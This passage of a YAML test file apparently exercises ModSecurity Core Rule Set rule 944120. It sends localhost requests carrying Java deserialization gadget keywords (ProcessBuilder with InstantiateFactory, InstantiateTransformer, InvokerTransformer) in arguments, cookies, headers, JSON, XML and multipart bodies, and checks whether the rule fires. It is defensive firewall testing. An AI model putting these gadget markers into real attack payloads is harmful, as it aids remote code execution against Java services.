"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.instantiatefactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-38 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-39 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-40 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-41 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-42 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-43 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-44 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: log_contains: "id \"944120\"" - test_title: 944120-45 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" output: log_contains: "id \"944120\"" - test_title: 944120-46 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-47 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.instantiatefactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-48 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.instantiatefactory": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-49 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.instantiatefactory -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.instantiatefactory -----------------------------thisissparta-- output: log_contains: id "944120" - test_title: 944120-51 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-52 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer=test" output: log_contains: "id \"944120\"" - test_title: 944120-53 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.instantiatetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-54 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.instantiatetransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-55 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.instantiatetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-56 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-57 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-58 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-59 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-60 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-61 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatetransformer" output: log_contains: "id \"944120\"" - test_title: 944120-62 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" output: log_contains: "id \"944120\"" - test_title: 944120-63 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-64 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.instantiatetransformer": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-65 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.instantiatetransformer": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-66 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-68 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.invokertransformer" output: log_contains: "id \"944120\"" - test_title: 944120-69 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer=test" output: log_contains: "id \"944120\"" - test_title: 944120-70 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=ProcessBuilder.evil.invokertransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-71 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: ProcessBuilder.evil.invokertransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-72 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: ProcessBuilder.evil.invokertransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944120\"" - test_title: 944120-73 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944120\"" - test_title: 944120-74 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944120\"" - test_title: 944120-75 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-76 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer" output: log_contains: "id \"944120\"" - test_title: 944120-77 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer" output: log_contains: "id \"944120\"" - test_title: 944120-78 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.invokertransformer" output: log_contains: "id \"944120\"" - test_title: 944120-79 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" output: log_contains: "id \"944120\"" - test_title: 944120-80 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-81 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.invokertransformer": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-82 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 